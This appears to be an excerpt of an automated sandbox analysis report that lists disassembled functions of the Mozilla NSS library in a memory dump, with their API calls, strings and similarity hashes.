EnterCriticalSection.KERNEL32(0000001C,?,6C78E477,?,?,?,00000001,00000000,?,?,6C793F23,?), ref: 6C792C76
PL_HashTableLookup.NSS3(00000000,?,?,6C78E477,?,?,?,00000001,00000000,?,?,6C793F23,?), ref: 6C792C86
PR_Unlock.NSS3(00000000,?,?,?,?,6C78E477,?,?,?,00000001,00000000,?,?,6C793F23,?), ref: 6C792C93

Part of subcall function 6C81DD70: TlsGetValue.KERNEL32 ref: 6C81DD8C
Part of subcall function 6C81DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4

TlsGetValue.KERNEL32(?,?,?,?,?,6C78E477,?,?,?,00000001,00000000,?,?,6C793F23,?), ref: 6C792CC6
EnterCriticalSection.KERNEL32(0000001C,?,?,?,?,?,6C78E477,?,?,?,00000001,00000000,?,?,6C793F23,?), ref: 6C792CDA
PL_HashTableLookup.NSS3(00000000,?,?,?,?,?,?,6C78E477,?,?,?,00000001,00000000,?,?,6C793F23), ref: 6C792CEA
PR_Unlock.NSS3(00000000,?,?,?,?,?,?,?,6C78E477,?,?,?,00000001,00000000,?), ref: 6C792CF7
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,6C78E477,?,?,?,00000001,00000000,?), ref: 6C792D4D
EnterCriticalSection.KERNEL32(?), ref: 6C792D61
PL_HashTableLookup.NSS3(?,?), ref: 6C792D71
PR_Unlock.NSS3(?), ref: 6C792D7E

Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607AD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607CD
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C6F204A), ref: 6C7607D6
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C6F204A), ref: 6C7607E4
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,6C6F204A), ref: 6C760864
Part of subcall function 6C7607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C760880
Part of subcall function 6C7607A0: TlsSetValue.KERNEL32(00000000,?,?,6C6F204A), ref: 6C7608CB
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608D7
Part of subcall function 6C7607A0: TlsGetValue.KERNEL32(?,?,6C6F204A), ref: 6C7608FB

Strings

#?yl, xrefs: 6C792C43

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Value$CriticalSection$EnterHashLookupTableUnlock$calloc$Leave
String ID: #?yl
API String ID: 2446853827-101552813
Opcode ID: 8c921c25add2d73404842b6f0b34fa6951c54498e4851ad2a64c54d174c5784b
Instruction ID: cca539bb5a89afce41e8296ae24c582d20a1c198c0117a31fa250013ba0724b2
Opcode Fuzzy Hash: 8c921c25add2d73404842b6f0b34fa6951c54498e4851ad2a64c54d174c5784b
Instruction Fuzzy Hash: A85127B6D00105ABDB10AF24ED498AAB778FF1635CB048534ED1897B12E731ED64C7E1

Function 6C7EAD90 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7EADB1

Part of subcall function 6C7CBE30: SECOID_FindOID_Util.NSS3(6C78311B,00000000,?,6C78311B,?), ref: 6C7CBE44

PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C7EADF4
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C7EAE08

Part of subcall function 6C7CB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C8A18D0,?), ref: 6C7CB095

SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C7EAE25
PL_FreeArenaPool.NSS3 ref: 6C7EAE63
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C7EAE4D

Part of subcall function 6C6F4C70: TlsGetValue.KERNEL32(?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4C97
Part of subcall function 6C6F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4CB0
Part of subcall function 6C6F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C6F3921,6C8D14E4,6C83CC70), ref: 6C6F4CC9

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7EAE93
PR_CallOnce.NSS3(6C8D2AA4,6C7D12D0), ref: 6C7EAECC
PL_FreeArenaPool.NSS3 ref: 6C7EAEDE
PL_FinishArenaPool.NSS3 ref: 6C7EAEE6
PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C7EAEF5
PL_FinishArenaPool.NSS3 ref: 6C7EAF16

Strings

security, xrefs: 6C7EADEE

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
String ID: security
API String ID: 3441714441-3315324353
Opcode ID: 71f27c4d46e2fa2ea7606bedf2af6483dacb8d60dcad7583035558c7a82d8037
Instruction ID: 04a78dc9bfe2ad9b2bdf503eef999ed46ea59457b21679fc11bdd8eb8f1b974d
Opcode Fuzzy Hash: 71f27c4d46e2fa2ea7606bedf2af6483dacb8d60dcad7583035558c7a82d8037
Instruction Fuzzy Hash: 834107B390421067E7205B189E4ABAA3BBCAF5A72CF150935E815D6F41F735EA08C7D3

Function 6C88AF70 Relevance: 22.7, APIs: 15, Instructions: 221threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C839890: TlsGetValue.KERNEL32(?,?,?,6C8397EB), ref: 6C83989E

EnterCriticalSection.KERNEL32(?), ref: 6C88AF88
_PR_MD_NOTIFYALL_CV.NSS3(?), ref: 6C88AFCE
PR_SetPollableEvent.NSS3(?), ref: 6C88AFD9
EnterCriticalSection.KERNEL32(?), ref: 6C88AFEF
_PR_MD_NOTIFY_CV.NSS3(?), ref: 6C88B00F
_PR_MD_UNLOCK.NSS3(?), ref: 6C88B02F
_PR_MD_UNLOCK.NSS3(?), ref: 6C88B070
PR_JoinThread.NSS3(?), ref: 6C88B07B
free.MOZGLUE(?), ref: 6C88B084
EnterCriticalSection.KERNEL32(?), ref: 6C88B09B
_PR_MD_UNLOCK.NSS3(?), ref: 6C88B0C4
PR_JoinThread.NSS3(?), ref: 6C88B0F3
free.MOZGLUE(?), ref: 6C88B0FC
PR_JoinThread.NSS3(?), ref: 6C88B137
free.MOZGLUE(?), ref: 6C88B140

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: CriticalEnterJoinSectionThreadfree$EventPollableValue
String ID:
API String ID: 235599594-0
Opcode ID: 0b324664a1a7b491b338a8a86616d56c9bdecf36b95eb6de74993fca6b7f7bac
Instruction ID: 62b1330decc2d4a07ea6a7ab2162bbaaa9a0ce60a1ecbb26c5d5f87fcc0d4cdb
Opcode Fuzzy Hash: 0b324664a1a7b491b338a8a86616d56c9bdecf36b95eb6de74993fca6b7f7bac
Instruction Fuzzy Hash: 0F915DB5901611DFCB20DF19CA80856BBF1FF853187298969D8199BB22E732FD46CBC1

Function 6C805CF0 Relevance: 22.7, APIs: 15, Instructions: 190COMMON

Download Yara Rule

APIs

Part of subcall function 6C802BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C802A28,00000060,00000001), ref: 6C802BF0
Part of subcall function 6C802BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6C802A28,00000060,00000001), ref: 6C802C07
Part of subcall function 6C802BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6C802A28,00000060,00000001), ref: 6C802C1E
Part of subcall function 6C802BE0: free.MOZGLUE(?,00000000,00000000,?,6C802A28,00000060,00000001), ref: 6C802C4A

free.MOZGLUE(?,?,6C80AAD4,?,?,?,?,?,?,?,?,00000000,?,6C8080C1), ref: 6C805D0F
free.MOZGLUE(?,?,?,6C80AAD4,?,?,?,?,?,?,?,?,00000000,?,6C8080C1), ref: 6C805D4E
free.MOZGLUE(?,?,?,6C80AAD4,?,?,?,?,?,?,?,?,00000000,?,6C8080C1), ref: 6C805D62
free.MOZGLUE(?,?,?,?,6C80AAD4,?,?,?,?,?,?,?,?,00000000,?,6C8080C1), ref: 6C805D85
free.MOZGLUE(?,?,?,?,6C80AAD4,?,?,?,?,?,?,?,?,00000000,?,6C8080C1), ref: 6C805D99
free.MOZGLUE(?,?,?,?,6C80AAD4,?,?,?,?,?,?,?,?,00000000,?,6C8080C1), ref: 6C805DFA
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,6C80AAD4,?,?,?,?,?,?,?,?,00000000,?,6C8080C1), ref: 6C805E33
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,6C80AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C805E3E
free.MOZGLUE(?,?,?,?,?,?,6C80AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C805E47
free.MOZGLUE(?,?,?,?,6C80AAD4,?,?,?,?,?,?,?,?,00000000,?,6C8080C1), ref: 6C805E60
SECITEM_ZfreeItem_Util.NSS3(00000008,00000000,?,?,?,6C80AAD4,?,?,?,?,?,?,?,?,00000000), ref: 6C805E78
free.MOZGLUE(?,?,?,?,?,?,?,6C80AAD4), ref: 6C805EB9
free.MOZGLUE(?,?,?,?,?,?,?,6C80AAD4), ref: 6C805EF0
SECKEY_DestroyPrivateKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,6C80AAD4), ref: 6C805F3D
SECKEY_DestroyPublicKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C80AAD4), ref: 6C805F4B

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: free$Destroy$Public$CertificatePrivate$Item_UtilZfree
String ID:
API String ID: 4273776295-0
Opcode ID: 5b0cd82b98cb966ebc46b27f349dca326bf2545eb119036ca8511a1cfaad7d4a
Instruction ID: 2e1e7f2baedfdccf9334dbf29fdcaa4c1b937e2b697ce5c6b51cef283a2d32dd
Opcode Fuzzy Hash: 5b0cd82b98cb966ebc46b27f349dca326bf2545eb119036ca8511a1cfaad7d4a
Instruction Fuzzy Hash: 217180B4A00B019FD720DF24D988A9277F5BF89308F148939D85E87711E731F955CBA1

Function 6C788DE0 Relevance: 22.7, APIs: 15, Instructions: 173memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?), ref: 6C788E22
EnterCriticalSection.KERNEL32(?), ref: 6C788E36
memset.VCRUNTIME140(?,00000000,?), ref: 6C788E4F
calloc.MOZGLUE(00000001,?,?,?), ref: 6C788E78
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C788E9B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C788EAC
PL_ArenaAllocate.NSS3(?,?), ref: 6C788EDE
memcpy.VCRUNTIME140(-00000008,?,?), ref: 6C788EF0
memset.VCRUNTIME140(?,00000000,?), ref: 6C788F00
free.MOZGLUE(?), ref: 6C788F0E
memcpy.VCRUNTIME140(?,?,?), ref: 6C788F39
memset.VCRUNTIME140(?,00000000,?), ref: 6C788F4A
memset.VCRUNTIME140(?,00000000,?), ref: 6C788F5B
PR_Unlock.NSS3(?), ref: 6C788F72
PR_Unlock.NSS3(?), ref: 6C788F82

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memset$memcpy$Unlock$AllocateArenaCriticalEnterSectionValuecallocfree
String ID:
API String ID: 1569127702-0
Opcode ID: e4c227acf365f9651af40915d1f4747a03b335c55c84e76027dca5de30e03625
Instruction ID: 53bb757dcaf87ab12245cc339c40754e17b0856ff4376d05723d7dbfeb58a36a
Opcode Fuzzy Hash: e4c227acf365f9651af40915d1f4747a03b335c55c84e76027dca5de30e03625
Instruction Fuzzy Hash: 665127B2E022159FDB209F68CE8496AB7B9EF45358F15453AED089BB00E731ED44C7E1

Function 6C7ACE90 Relevance: 22.6, APIs: 15, Instructions: 129COMMON

Download Yara Rule

APIs

PK11_DoesMechanism.NSS3(?,00000132), ref: 6C7ACE9E
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C7ACEBB
PK11_DoesMechanism.NSS3(?,00001081), ref: 6C7ACED8
PK11_DoesMechanism.NSS3(?,00000551), ref: 6C7ACEF5
PK11_DoesMechanism.NSS3(?,00000651), ref: 6C7ACF12
PK11_DoesMechanism.NSS3(?,00000321), ref: 6C7ACF2F
PK11_DoesMechanism.NSS3(?,00000121), ref: 6C7ACF4C
PK11_DoesMechanism.NSS3(?,00000400), ref: 6C7ACF69
PK11_DoesMechanism.NSS3(?,00000341), ref: 6C7ACF86
PK11_DoesMechanism.NSS3(?,00000311), ref: 6C7ACFA3
PK11_DoesMechanism.NSS3(?,00000301), ref: 6C7ACFBC
PK11_DoesMechanism.NSS3(?,00000331), ref: 6C7ACFD5
PK11_DoesMechanism.NSS3(?,00000101), ref: 6C7ACFEE
PK11_DoesMechanism.NSS3(?,00000141), ref: 6C7AD007
PK11_DoesMechanism.NSS3(?,00001008), ref: 6C7AD021

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: DoesK11_Mechanism
String ID:
API String ID: 622698949-0
Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction ID: d71861b3d45e424af87785eeb7c0594796b62e7ef0f97990e010552d3e1d2250
Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction Fuzzy Hash: 16312171B529112BEF0D509B6F2DBDF244A4B6630EF441138FD0AF67C1FAC59A1702AA

Function 6C880FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON

Download Yara Rule

APIs

PR_Lock.NSS3(?), ref: 6C881000

Part of subcall function 6C839BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C761A48), ref: 6C839BB3
Part of subcall function 6C839BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C761A48), ref: 6C839BC8

PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C881016

Part of subcall function 6C81C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C81C2BF

PR_Unlock.NSS3(?), ref: 6C881021

Part of subcall function 6C81DD70: TlsGetValue.KERNEL32 ref: 6C81DD8C
Part of subcall function 6C81DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C81DDB4

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C881046
PR_Unlock.NSS3(?), ref: 6C88106B
PR_Lock.NSS3 ref: 6C881079
PR_Unlock.NSS3 ref: 6C881096
free.MOZGLUE(?), ref: 6C8810A7
free.MOZGLUE(?), ref: 6C8810B4
PR_DestroyCondVar.NSS3(?), ref: 6C8810BF
PR_DestroyCondVar.NSS3(?), ref: 6C8810CA
PR_DestroyCondVar.NSS3(?), ref: 6C8810D5
PR_DestroyCondVar.NSS3(?), ref: 6C8810E0
PR_DestroyLock.NSS3(?), ref: 6C8810EB
free.MOZGLUE(?), ref: 6C881105

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
String ID:
API String ID: 8544004-0
Opcode ID: 20e58db071378e3ab96b8d8fa165a6e23142d8334961c51cf5d0891d3c52fef8
Instruction ID: c68648bfbfec31e49407938fce6ced4a348bd8e3600e179bc65660232b309f74
Opcode Fuzzy Hash: 20e58db071378e3ab96b8d8fa165a6e23142d8334961c51cf5d0891d3c52fef8
Instruction Fuzzy Hash: 9631BCB9901402ABD7229F15EE46A45B7B1FF0136DB184535E80903F61EB32F978DBD2

Function 6C6FDC60 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6C6FDD56
memcpy.VCRUNTIME140(0000FFFE,?,?), ref: 6C6FDD7C
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6C6FDE67
memcpy.VCRUNTIME140(0000FFFC,?,?), ref: 6C6FDEC4
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C6FDECD

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C6FDF6D, 6C6FDFCC, 6C6FDFDD
database corruption, xrefs: 6C6FDF77, 6C6FDFE7
%s at line %d of [%.10s], xrefs: 6C6FDF7C, 6C6FDFEC

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: memcpy$_byteswap_ulong
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 2339628231-598938438
Opcode ID: 6013044c647a689d661ab640c9c90b7c55addd138cd46310c0bb5fcb0012103e
Instruction ID: df36eb7f1c3475609f653ad7044afd001527cdb5d38d8493b253b6a4cfe6e8e8
Opcode Fuzzy Hash: 6013044c647a689d661ab640c9c90b7c55addd138cd46310c0bb5fcb0012103e
Instruction Fuzzy Hash: 0EA1D4716042019FD710DF29C980A6AB7F6EF85308F15892DF8A98BB51D730F847CBA5

Function 6C7BEDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6C7BEE0B

Part of subcall function 6C7D0BE0: malloc.MOZGLUE(6C7C8D2D,?,00000000,?), ref: 6C7D0BF8
Part of subcall function 6C7D0BE0: TlsGetValue.KERNEL32(6C7C8D2D,?,00000000,?), ref: 6C7D0C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C7BEEE1

Part of subcall function 6C7B1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C7B1D7E
Part of subcall function 6C7B1D50: EnterCriticalSection.KERNEL32(?), ref: 6C7B1D8E
Part of subcall function 6C7B1D50: PR_Unlock.NSS3(?), ref: 6C7B1DD3

TlsGetValue.KERNEL32 ref: 6C7BEE51
EnterCriticalSection.KERNEL32(?), ref: 6C7BEE65
PR_Unlock.NSS3(?), ref: 6C7BEEA2
free.MOZGLUE(?), ref: 6C7BEEBB
PR_SetError.NSS3(00000000,00000000), ref: 6C7BEED0
PR_Unlock.NSS3(?), ref: 6C7BEF48
free.MOZGLUE(?), ref: 6C7BEF68
PR_SetError.NSS3(00000000,00000000), ref: 6C7BEF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6C7BEFA4
free.MOZGLUE(?), ref: 6C7BEFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C7BF055
free.MOZGLUE(?), ref: 6C7BF060

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: 8034aef395cdf0d80c23a7cc3d7ff3324e6022aa23a75d88642181effa17d4e3
Instruction ID: f40c75c7d403bf1e4fb6683cfb4846f901048a5a0a10af57ab979adbe410b002
Opcode Fuzzy Hash: 8034aef395cdf0d80c23a7cc3d7ff3324e6022aa23a75d88642181effa17d4e3
Instruction Fuzzy Hash: 54814FB5A00209AFEB109FA5DD45ADE77B9BF08318F544074F909A7B11E731E924CBE1

Function 6C784CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6C784D80
PORT_Alloc_Util.NSS3(00000000), ref: 6C784D95
PORT_NewArena_Util.NSS3(00000800), ref: 6C784DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C784E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C784E43
PORT_NewArena_Util.NSS3(00000800), ref: 6C784E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C784E85
DER_Encode_Util.NSS3(?,?,6C8D05A4,00000000), ref: 6C784EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C784F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C784F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C784F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C784F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C784F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C784FC8

Memory Dump Source

Source File: 00000000.00000002.2699609506.000000006C6F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C6F0000, based on PE: true

Associated: 00000000.00000002.2699575599.000000006C6F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699876152.000000006C88F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699957364.000000006C8CE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2699991534.000000006C8CF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700046186.000000006C8D0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2700071293.000000006C8D5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c6f0000_file.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: 0129e0cec2f8436e51a6cd100d3e88383dbd44b224626c21e379fed43f78a82d
Instruction ID: ac262cbec8a4569b5b20c569ac3139ab1b32e701c8abf289d83737bc8e4b4ae3
Opcode Fuzzy Hash: 0129e0cec2f8436e51a6cd100d3e88383dbd44b224626c21e379fed43f78a82d
Instruction Fuzzy Hash: BE81B471909301AFE711CF28DA54B5BB7E8AB84318F15893DFA58DB641E770EA04CB92

Function 6C7C5C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON

Download Yara Rule

APIs

SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6C7C5C9B
PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6C7C5CF4
